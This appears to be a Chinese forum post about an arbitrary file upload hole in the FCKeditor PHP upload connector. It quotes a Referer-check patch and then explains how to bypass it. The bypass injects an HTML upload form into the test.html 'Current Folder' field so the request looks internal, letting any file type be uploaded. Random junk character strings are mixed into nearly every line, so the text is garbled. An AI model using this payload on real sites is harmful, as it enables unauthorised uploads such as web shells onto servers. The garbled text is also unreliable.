漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
7 z) n* u- \( L% @8 E网上给出的修复方案是, o7 x$ @' j6 m9 c" Q3 E/ {4 t
修复方法,删除FCK编辑器用其他的编辑器$ w% W0 u9 g9 J; v9 L
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件1 N- M2 T: _/ E& h j# Y/ ^
在
- w. t& o" Q c5 J! q- nrequire(‘config.php’);
2 L- d8 L. a7 q y' x) W1 Zrequire(‘util.php’);% |, \# }" E9 P, f
的下面添加以下代码—————————– h- ~6 W+ N$ ?% ?
//防止外部提交
' ~2 c+ l1 j( s& f0 [$ X2 xfunction outsidepost()
* Z" i2 }2 O q1 L8 |{; l( }9 [' k8 O
$servername=$_SERVER['SERVER_NAME'];
& _) y& x( \2 W8 I$sub_from=@$_SERVER['HTTP_REFERER'];! x$ h: v9 n2 O3 Q4 C: `" a
$sub_len=strlen($servername);# c$ B) @( N( P
$checkfrom=substr($sub_from,7,$sub_len);
1 y2 R8 k0 F$ \! c- Dif($checkfrom!=$servername){
0 K9 u# F3 `; x( \9 q' jecho(“you don’t outsidepost!”);
! Y) G1 I! a- |exit;
# ~# }7 N( |8 U! F% f [}
+ w) G+ P7 b6 `1 G8 V# A" S}4 @+ L# j; d% F' M
outsidepost();- T9 z) ]' [& [( y' \% q3 e' f' R5 m. N
防止外部提交,但是没有防止内部提交," H- m$ x& ~% T5 J$ v4 B% q0 J7 l3 ^
利用方法:& e7 \, V7 J( y) N
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
6 K0 Z+ j6 [0 j+ y1 c3 x2,在Current Folder 框输入/ E y, W. M, F5 @: I; Y) h
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
( l. l) M* V/ \7 N然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。2 C. f$ Z) L2 U. t" h
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |